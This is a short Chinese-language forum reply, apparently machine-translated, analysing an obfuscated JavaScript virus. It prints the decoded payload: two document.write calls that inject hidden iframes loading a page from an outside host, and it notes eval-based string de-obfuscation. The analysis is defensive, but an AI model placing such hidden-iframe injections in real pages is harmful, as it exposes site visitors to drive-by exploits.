一种病毒.我在数组文字中包含一些带有Unicode转义字符的字符串,第一个是html,第二个是html "write".然后,document[arr[1]](arr[0])执行,转换为以下内容:
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
我不知道(也不会检查)这些iframe包含的内容,可能会有一些漏洞利用.
此外,代码确实包含(在这两个iframe写入之间)一些函数(_1lO和O0l)可能IlO在它被eval编辑之前解除字符串(是的,eval是邪恶的!:-),但是你的pastebin前面有一些丢失的代码片段,所以我不能告诉你他们到底做了什么.你能给我们整个剧本吗?